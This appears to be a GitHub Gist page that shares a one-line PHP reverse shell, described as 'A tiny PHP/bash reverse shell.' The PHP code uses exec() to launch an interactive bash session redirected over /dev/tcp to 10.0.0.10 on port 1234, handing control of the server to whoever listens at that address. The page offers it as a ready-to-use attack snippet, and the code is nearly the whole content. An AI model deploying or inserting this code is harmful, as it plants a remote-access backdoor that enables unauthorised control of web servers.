Skip to content

Instantly share code, notes, and snippets.

@5kyc0d3r
Forked from rshipp/shell.php
Created October 3, 2018 06:03
Show Gist options
  • Save 5kyc0d3r/a01d5d4cf7a98e6db233b8894da09d4b to your computer and use it in GitHub Desktop.
Save 5kyc0d3r/a01d5d4cf7a98e6db233b8894da09d4b to your computer and use it in GitHub Desktop.
A tiny PHP/bash reverse shell.
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'");
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment